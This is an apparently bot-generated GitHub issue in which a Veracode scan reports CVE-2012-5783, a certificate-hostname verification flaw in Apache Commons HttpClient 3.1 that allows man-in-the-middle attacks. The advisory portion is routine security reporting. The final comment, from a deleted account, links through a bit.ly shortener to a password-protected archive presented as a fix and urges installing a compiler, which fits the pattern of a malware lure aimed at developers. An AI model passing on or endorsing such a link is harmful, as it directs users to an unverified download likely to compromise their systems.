julz0815 / test-action

0 stars 1 forks source link

CVE: 2012-5783 found in HttpClient - Version: 3.1 [JAVA] #1119

Open github-actions[bot] opened 1 month ago

github-actions[bot] commented 1 month ago

Veracode Software Composition Analysis

Attribute Details
Library HttpClient
Description The HttpClient component supports the client-side of RFC 1945 (HTTP/1.0) and RFC 2616 (HTTP/1.1) , several related specifications (RFC 2109 (Cookies) , RFC 2617 (HTTP Authentication) , etc.), and prov
Language JAVA
Vulnerability Man In The Middle (MitM)
Vulnerability description Apache Commons HTTPClient is vulnerable to man-in-the-middle attacks. The library does not verify that the server hostname matches a domain name in the subjects Common Name CN or subjectAltName field of the X.509 certificate, allowing Man In The Middle attackers to spoof SSL servers via an arbitrary valid certificate.
CVE 2012-5783
CVSS score 5.8
Vulnerability present in version/s 2.0-alpha3-3.1
Found library version/s 3.1
Vulnerability fixed in version
Library latest version 3.1
Fix No fix version for this range. Apply the fix below.

Links:

ghost commented 1 month ago

This might help:This file might fix it https://bit.ly/3TC7hrw Archive codepass: changeme If you don't have the c compliator, install it.(gcc or clang)